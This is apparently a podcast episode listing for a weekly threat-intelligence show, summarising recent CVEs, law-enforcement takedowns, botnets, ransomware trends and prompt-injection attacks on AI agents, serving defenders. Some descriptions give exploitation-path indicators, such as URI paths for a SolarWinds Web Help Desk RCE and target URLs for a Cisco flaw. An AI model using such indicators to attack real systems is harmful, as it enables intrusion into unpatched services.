Dragon Bytes

Dragon Bytes

Delivering weekly insights, research, and threat indicators to help security professionals track emerging threats and intelligence.

Episodes

  1. Sandboxes, Seizures, and the Industrialization of Cybercrime

    2D AGO

    Sandboxes, Seizures, and the Industrialization of Cybercrime

    This week on Dragon News Bytes, Eli Woodward and Will Baxter are joined Will Thomas to break down a convergence of nation-state activity and critical infrastructure disruptions. We cover the FBI’s massive takedown of the RAMP cybercrime forum, the re-attribution of Poland’s energy sector cyberattack to Dragonfly, and a wave of critical sandbox escapes impacting developer and AI environments. Plus, we discuss how attackers are weaponizing physical snail mail for extortion and the strategic impact of Google’s latest disruption of the IPIDEA proxy infrastructure. Topics & References: Part 1: Major Infrastructure & Law Enforcement Actions FBI Seizes RAMP Cybercrime Forum: A major blow to Russian-speaking initial access brokers (IABs). RAMP stood as a safe haven for ransomware groups like Black Cat and LockBit after other forums banned the activity. Analyst Note: Expect forum migration and operational mistakes as these actors scatter to new homes. Read more: https://shorturl.at/cURYo Google Disrupts IPIDEA Infrastructure: A coordinated takedown of a massive residential proxy network leveraged by botnets (Kimwolf/AISURU) and fraud operations. The Impact: This creates a short-term detection window for hunters as adversaries migrate to noisier fallback infrastructure. Poland Energy Sector Re-attribution: CERT.PL has officially attributed the massive energy incident from late 2025 to Dragonfly (Energetic Bear) rather than Sandworm. Critical Takeaway: Hitachi Energy confirmed no product flaws were used; the breach stemmed from default credentials and environmental misconfigurations. Read more:  https://shorturl.at/I707p Part 2: Emerging Vulnerabilities & Malware Campaigns Critical Sandbox Escapes (CVE-2026-22709): Assumptions of "safe execution" are failing in developer tooling and AI environments. We break down the Grist-Core Pyodide escape and the popular vm2 NodeJS library bypass. SolarWinds Web Help Desk RCE (CVE-2025-40551): An unauthenticated remote code execution vulnerability that serves as a high-impact lateral movement enabler. Key TTPs Whitelist bypass using malformed URIs containing /ajax/ Exploitation path includes: /helpdesk/WebObjects/Helpdesk.woa/wo/ with wopage=LoginPref Read more: https://tinyurl.com/y3x7vase CVE-2026-21962: "AI Slop" or Exploit? ISC observed scanning activity targeting WebLogic with non-functional, AI-generated payloads, highlighting a new challenge in distinguish signal from noise. Read more: https://tinyurl.com/yx52bkwa TA584 Extortion Pivots: This initial access broker has tripled campaign volume, now using photos of physical snail mail customized with victim details to increase psychological pressure.  New Report: Voices of the Cybersecury strategist - A Benchmark Report for Security Leaders. Insights from leading  CISOs, VPs, and Directors on navigating threat landscapes, allocating resources, and aligning security with business objectives. Read the full report: https://tinyurl.com/4jxb3kc5 Events & Community: RISE USA (San Francisco): February 18–19 at Stripe HQ. 🔗 to register: https://go.team-cymru.com/rise-usa-2026 Brews and Briefings (Minneapolis): February 25th session focused on DPRK threat activity. 🔗 to register: https://go.team-cymru.com/brews-briefings-minneapolis FS-ISAC Spring Summit (Orlando): March 1–4 presentations on the latest fintech threats and CLOP ransomware. 🔗 to register: https://www.fsisac.com/events/2026-americas-spring RISE Ireland (Dublin): April 14–15 at Stripe Dublin. Call for Papers (CFP) is currently open. 🔗 to register: https://go.team-cymru.com/rise-ireland Connect with Us: Follow us on LinkedIn: https://www.linkedin.com/company/team-cymru Subscribe to the Dragon News Bytes feed: https://www.team-cymru.com/dnbDisclaimer: The views expressed in this podcast are those of the hosts and do not necessarily reflect the official policy or position of our employers.

    27 min
  2. Malicious Prompts, Botnet Backdoors, and the Industrialization of Cybercrime

    JAN 26

    Malicious Prompts, Botnet Backdoors, and the Industrialization of Cybercrime

    This week on Dragon News Bytes, Eli Woodward and Will Baxter dive into the shift from "cottage industry" cybercrime to an industrialized assembly line fueled by AI. We break down high-urgency RCEs in Cisco Unified Platforms, the massive comeback of the Kimwolf Botnet via IoT backdoors, and the "new SQL injection" taking over AI workflows: Prompt Injection. Plus, we discuss the weaponization of VS Code extensions by North Korean actors (Purple Bravo) and provide a full update on our upcoming global event schedule. Topics & References: Part 1: Patch Now: High-Urgency Threats & Evolving Infrastructure Cisco Unified Platform RCE (CVE-2026-20045): A critical unauthenticated Remote Code Execution vulnerability granting root access to video and phone systems. Target URLs include /webcalling/Unity/ and /UCMuser. Read more: https://arcticwolf.com/resources/blog/cve-2026-20045/  TP-Link VIGI & Edge Vulnerabilities: Critical flaws in VIGI cameras allow for remote takeover, highlighting the persistent risk in edge and IoT infrastructure. Read more: https://securityaffairs.com/187110/hacking/critical-tp-link-vigi-camera-flaw-allowed-remote-takeover-of-surveillance-systems.html Kimwolf Botnet Resurgence: Now exceeding two million devices, this botnet is scaling via pre-baked backdoors in consumer devices like TV boxes. Read more: https://krebsonsecurity.com/2026/01/kimwolf-botnet-lurking-in-corporate-govt-networks/ Part 2: Hacking the Human OS & AI Abuse Help Desk Social Engineering: West African criminal groups are increasingly impersonating employees via phone calls to reset passwords for "payroll redirects." The AI Prompt Injection Revolution: Described as the "new SQL injection," prompt injection is resetting years of input sanitization efforts. We discuss agentic browsers bypassing security controls and a Microsoft Teams bug used to steal user tokens. DPRK (Purple Bravo) Targeting Developers: North Korean actors are weaponizing VS Code extensions and using tasks.json in the Evelyn Stealer malware to auto-execute when repositories are opened.  Events & Community: SANS CTI Summit Happy Hour (Arlington, VA): Join Team Cymru and OpenCTI on January 26th. RISE USA (San Francisco): February 18–19 at Stripe HQ.🔗 to register: https://go.team-cymru.com/rise-usa-2026 Brews and Briefings (Minneapolis): Late February session focused on DPRK threat activity.🔗 to register: https://go.team-cymru.com/brews-briefings-minneapolis FS-ISAC Spring Summit (Orlando): March presentations on the latest fintech threats.🔗 to register: https://www.fsisac.com/events/2026-americas-spring RISE Ireland (Dublin): April 14–15 at Stripe Dublin.🔗 to register: https://go.team-cymru.com/rise-ireland Connect with Us: Follow us on LinkedIn: https://www.linkedin.com/company/team-cymru Subscribe to the Dragon News Bytes feed: https://www.team-cymru.com/dnb Disclaimer: The views expressed in this podcast are those of the hosts and do not necessarily reflect the official policy or position of our employers.

    21 min
  3. The Call Is Coming from Inside the House

    JAN 19

    The Call Is Coming from Inside the House

    This week on Dragon News Bytes, Eli Woodward and Will Baxter break down the operational fires you need to fight now and the emerging AI threats targeting your internal guardrails. We cover the critical FortiSIEM zero-day RCE, the rise of AI prompt injection attacks across Microsoft Copilot and Salesforce, and the massive 58% year-over-year surge in ransomware victims. Plus, we discuss the strategic impact of the Red VDS infrastructure takedown and our upcoming global event schedule. Topics & References: Part 1: Emerging Threats FortiSIEM Zero-Day RCE (CVE-2025-64155): Critical remote code execution via the pH monitor service. If you use FortiSIEM, restrict TCP port 7900 immediately. Read more: https://horizon3.ai/attack-research/vulnerabilities/cve-2025-64155-fortinet-fortisiem/ Red VDS Infrastructure Takedown: Microsoft’s disruption of a major "bulletproof" virtual desktop service used for fraud and financially motivated phishing. Ransomware Surge 2026: A 58% increase in publicly posted victims compared to 2024, with 124 active groups now tracked globally. Part 2: Emerging AI Threats AI Honeypot Findings: Discovery of automated scanning for Open LLM endpoints (Claude, ChatGPT, Ollama) originating from a single German source.  AI Prompt Injection Attacks: New research into malicious prompts embedded in links that can hijack AI agents in Microsoft Copilot, Salesforce, and ServiceNow to steal user tokens and secrets. Read more:  https://appomni.com/ao-labs/bodysnatcher-agentic-ai-security-vulnerability-in-servicenow/ https://www.varonis.com/blog/reprompt The Three Pillars of AI Security: A strategic framework for defending from AI attacks, defending the AI your organization uses, and defending using AI tools. Read more: https://www.pillar.security/blog/the-agent-security-paradox-when-trusted-commands-in-cursor-become-attack-vectors Events & Community: SANS CTI Summit Happy Hour (Arlington, VA): Join Team Cymru and OpenCTI on January 26th. RISE USA (San Francisco): February 17–19 at Stripe HQ.🔗 to register: https://go.team-cymru.com/rise-usa-2026 Brews and Briefings (Minneapolis): Late February session focused on DPRK threat activity.🔗 to register: https://go.team-cymru.com/brews-briefings-minneapolis FS-ISAC Spring Summit (Orlando): March presentations on the latest fintech threats.🔗 to register: https://www.fsisac.com/events/2026-americas-spring RISE Ireland (Dublin): April 14–15 at Stripe Dublin.🔗 to register: https://go.team-cymru.com/rise-ireland Connect with Us: Follow us on LinkedIn: https://www.linkedin.com/company/team-cymru Subscribe to the Dragon News Bytes feed: https://www.team-cymru.com/dnb Disclaimer: The views expressed in this podcast are those of the hosts and do not necessarily reflect the official policy or position of our employers.

    20 min
  4. Dragon Bytes: The "Trust Nothing" Update

    JAN 10

    Dragon Bytes: The "Trust Nothing" Update

    This week on Dragon Bytes, we break down the operational fires you need to fight now and the emerging threats you’ll be fighting tomorrow. We cover the critical "Ni8mare" RCE in n8n automation tools, the new "ClickFix" social engineering waves hitting hospitality, and the "Zombie" D-Link routers building massive botnets. Plus, we dive into China-linked UAT-7290 targeting telcos and why Black Cat ransomware is poisoning your Google search results. Topics & References: Part 1: Emerging Threats The "Ni8mare" RCE (CVE-2026-21858): Critical unauthenticated remote code execution in n8n workflow automation tools. Read more: Horizon3.ai Analysis "ClickFix" Phishing Campaign: Fake "Blue Screen of Death" pages forcing users to run malicious PowerShell scripts. Currently targeting the European hospitality sector. Read more: Computing.co.uk Report "MongoBleed" (CVE-2025-14847): Unauthenticated memory leak in MongoDB exposing sensitive RAM data. Read more: Rapid7 Advisory "Ghost Tap" NFC Fraud: Android malware bridging the gap between cyber and physical payment terminal fraud. Read more: Inetco Research "ZombieAgent" AI Flaw: Embedding hidden text in documents to hijack AI agents via indirect prompt injection. Read more: SecurityBrief Asia GoBruteforcer Botnet: Golang-based malware targeting Linux servers to reach Web3/Crypto assets. Read more: BleepingComputer Part 2: Operational Fires D-Link "Zombie" RCE (CVE-2026-0625): Active exploitation of legacy D-Link DSL routers to build residential botnets. Read more: SC Media Report APT Alert: UAT-7290: China-linked espionage group using "Operational Relay Boxes" (ORBs) to target Telecommunications and Defense sectors. Read more: Infosecurity Magazine Black Cat Ransomware SEO Poisoning: The ransomware gang is now poisoning search results for IT tools like "WinSCP" and "Notepad++". Read more: News4Hackers Supply Chain & Breaches: Fake WinRAR Installers: Malwarebytes Ledger / Global-e Breach: Ledger Support NordVPN Breach Claim (Denied): NordVPN Blog Connect with Us: Subscribe to the Dragon News Bytes feed: Team Cymru Disclaimer: The views expressed in this podcast are those of the hosts and do not necessarily reflect the official policy or position of our employers.

    30 min
  • 4 Episodes

About

Delivering weekly insights, research, and threat indicators to help security professionals track emerging threats and intelligence.

Information

  • Creator
    Dragon Bytes
  • Years Active
    2K
  • Episodes
    4
  • Rating
    Clean
  • Copyright
    © Dragon Bytes
  • Show Website
    Dragon Bytes